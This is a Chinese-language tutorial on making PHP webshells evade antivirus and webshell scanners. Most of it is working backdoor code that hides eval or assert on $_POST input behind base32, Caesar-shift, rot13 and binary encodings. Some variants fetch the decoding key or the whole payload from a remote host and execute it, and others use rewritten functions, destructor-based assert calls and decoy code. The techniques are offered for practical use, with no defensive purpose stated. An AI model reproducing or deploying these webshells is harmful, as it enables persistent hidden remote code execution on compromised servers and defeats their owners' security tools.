【网络安全】一些webshell免杀的技巧

前言

由于杀软的规则在不断更新所以很多之前的过杀软方法基本上都不行了而且随着php7逐渐扩张 assert马也将被淘汰所以本文将提出几种免杀思路效果很好而且不会被杀软的正则和沙盒规则约束。

自定义加密Bypass

部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则比如某dir+

比如这个都能被检测出是shell

所以为了防止这种的规则自定义加密显然是最优解

自定义加密可选性多了只要能把加密后的字符还原回去就行比如base32 base58 这类的base编码全家桶或者自定义ascii移位甚至是对称加密算法等都是可以绕过这类规则检测

base32编码payload
（https://github.com/pureqh/webshell）：

<?php
class KUYE{public $DAXW = null;public $LRXV = null;function __construct(){$this->DAXW = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';$this->LRXV = @SYXJ($this->DAXW);@eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");}}
new KUYE();
function MNWK($QSFX){$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';$NLHB = '';$v = 0;$vbits = 0;for ($i = 0, $j = strlen($QSFX); $i < $j; $i++){$v <<= 8;$v += ord($QSFX[$i]);$vbits += 8;while ($vbits >= 5) {$vbits -= 5;$NLHB .= $BASE32_ALPHABET[$v >> $vbits];$v &= ((1 << $vbits) - 1);}}if ($vbits > 0){$v <<= (5 - $vbits);$NLHB .= $BASE32_ALPHABET[$v];}return $NLHB;}
function SYXJ($QSFX){$NLHB = '';$v = 0;$vbits = 0;for ($i = 0, $j = strlen($QSFX); $i < $j; $i++){$v <<= 5;if ($QSFX[$i] >= 'a' && $QSFX[$i] <= 'z'){$v += (ord($QSFX[$i]) - 97);} elseif ($QSFX[$i] >= '2' && $QSFX[$i] <= '7') {$v += (24 + $QSFX[$i]);} else {exit(1);}$vbits += 5;while ($vbits >= 8){$vbits -= 8;$NLHB .= chr($v >> $vbits);$v &= ((1 << $vbits) - 1);}}return $NLHB;}
?>

ascii码移位payload（凯撒加密）

<?php
class FKPC{function __construct(){$this->TQYV = "bs^i%!\MLPQXwbolZ&8";$this->WZDM = @HHGJ($this->TQYV);@eval("/*#jkskjwjqo*/".$this->WZDM."/*sj#ahajsj*/");}}
new FKPC();
function HHGJ($UyGv) {
$svfe = [];
$mxAS = '';
$f = $UyGv;
for ($i=0;$i<strlen($f);$i++)
{$svfe[] = chr((ord($f[$i])+3));
}
$mxAS = implode($svfe);
return $mxAS ;
}
?>

居然没过webdir+
那如何解决呢我们后面再说当然应付D盾还是绰绰有余了

Rot13加密payload

<?phpclass KUYE{public $DAXW = null;public $LRXV = null;function __construct(){$this->DAXW = 'riny($_CBFG[mreb]);';$this->LRXV = @str_rot13($this->DAXW);@eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");}}
new KUYE();?>

二进制转化payload

<?phpclass KUYE{public $DAXW = null;public $LRXV = null;function __construct(){$this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 1001111 1010011 1010100 1011011 1111010 1100101 1110010 1101111 1011101 101001 111011';$this->LRXV = @BinToStr($this->DAXW);@eval("/*GnSpe=u*/".$this->LRXV."/*GnSpe=u*/");}}
new KUYE();
function BinToStr($str){$arr = explode(' ', $str);foreach($arr as &$v){$v = pack("H".strlen(base_convert($v, 2, 16)), base_convert($v, 2, 16));}return join('', $arr);
}
?>

这里就不列举了只要方法正确绕过杀软是很简单的

通过http获得关键参数

上面那个凯撒密码不是被webdir+杀了吗我们在这里将他绕过

众所周知凯撒密码需要设置往前或往后移几位ascii 这个参数可以设置为解密方法的输入参数经过测试此参数在源码中会被沙盒跑出了因此不能过百度杀毒，那么我不写本地不就行了我直接起一个http服务访问文本获得参数值。

<?php
class FKPC{function __construct(){$url = "http://xxxxx:8080/1.txt";$fp = fopen($url, 'r');stream_get_meta_data($fp);while (!feof($fp)) {$body.= fgets($fp, 1024);}$this->x = $body;$this->TQYV = "bs^i%!\MLPQXwbolZ&8";$this->WZDM = @HHGJ($this->TQYV,$this->x);@eval("/*#jkskjwjqo*/".$this->WZDM."/*sj#ahajsj*/");}}
new FKPC();function HHGJ($UyGv,$x) {
$svfe = [];
$mxAS = '';
$f = $UyGv;
for ($i=0;$i<strlen($f);$i++)
{$svfe[] = chr((ord($f[$i])+$x));
}
$mxAS = implode($svfe);
return $mxAS ;
}
?>

当然肯定能用

但是这转了一圈简直不低碳啊我不能直接http获取payload吗 …
【学习攻略】

简化代码：

<?php
class KUYE{public $a = 'yshasaui';public $b = '';function __construct(){$url = "http://xxx/1.txt";$fp = fopen($url, 'r');stream_get_meta_data($fp);while (!feof($fp)) {$body.= fgets($fp, 1024);}$this->b = $body;@eval("/*GnSpe=121u*/".$this->b."/*Gn212Spe=u*/");}}
new KUYE();
?>

重写函数Bypass

众所周知正则类杀软最喜欢直接把危险函数加入规则那么它杀的是函数名还是逻辑呢？
【学习攻略】

试一试就知道了

我们的样本如下：

<?php$a = substr("assertxx",0,6);$a($_POST['x']);?>

这是个使用substr函数切割关键字的小马

直接扔到webdir+杀

毫无疑问的被杀了

那么我们重写substr函数

function mysubstr($string, $start = 0, $length = null) {$result = '';$strLength = strlen($string);if ($length === null) {$length = $strLength;}$length = (int) $length;$start = $start < 0 ? ($strLength + $start) : ($start);$end = $length < 0 ? ($strLength + $length) : $start + $length;if ($start > $strLength || ($end - $start) === 0) {return $result;}for (; $start < $end; $start ++) {$result .= $string[$start];}return $result;
}

然后把函数替换

<?php
$b = 'assert(xyz@';
$c =  mysubstr($b,0,6);
$c($_POST['zero']);
function mysubstr($string, $start = 0, $length = null) {$result = '';$strLength = strlen($string);if ($length === null) {$length = $strLength;}$length = (int) $length;$start = $start < 0 ? ($strLength + $start) : ($start);$end = $length < 0 ? ($strLength + $length) : $start + $length;if ($start > $strLength || ($end - $start) === 0) {return $result;}for (; $start < $end; $start ++) {$result .= $string[$start];}return $result;
}
?>

再拿去杀

结论很清楚了

再来D盾杀一下

不错报2级了这就是沙盒型查杀和正则类查杀的明显区别怎么过呢用构造方法即可

<?phpclass pure
{public $a = '';function __destruct(){assert("$this->a");}
}
$b = new pure;
$b->a = $_POST['zero'];
function mysubstr($string, $start = 0, $length = null) {$result = '';$strLength = strlen($string);if ($length === null) {$length = $strLength;}$length = (int) $length;$start = $start < 0 ? ($strLength + $start) : ($start);$end = $length < 0 ? ($strLength + $length) : $start + $length;if ($start > $strLength || ($end - $start) === 0) {return $result;}for (; $start < $end; $start ++) {$result .= $string[$start];}return $result;
}
?>

看到这里大家可能也很奇怪这里都没用到mysubstr函数放上去不是多此一举吗
【学习攻略】

不好意思恰恰不是我们可以去掉这个函数用D盾杀一下

<?phpclass pure
{public $a = '';function __destruct(){assert("$this->a");}
}
$b = new pure;
$b->a = $_POST['zero'];
?>

怎么样是不是很有趣

这里放这堆代码并不是为了真的用它而是为了过D盾的特征查杀所以放什么函数是无所谓的。

比如这样：

<?phpclass pure
{public $a = '';function __destruct(){assert("$this->a");}
}
$b = new pure;
$b->a = $_POST['zero'];
function mysubstr($a,$b) {echo "?sasasjajksjka";echo "?sasasjajksjka";echo "?sasasjajksjka";echo "?sasasjajksjka";echo "?sasasjajksjka";echo "?sasasjajksjka";echo "?sasasjajksjka";echo "?sasasjajksjka";
}
?>

这里只介绍了重写substr函数那么其他的函数可以吗当然可以

【学习攻略】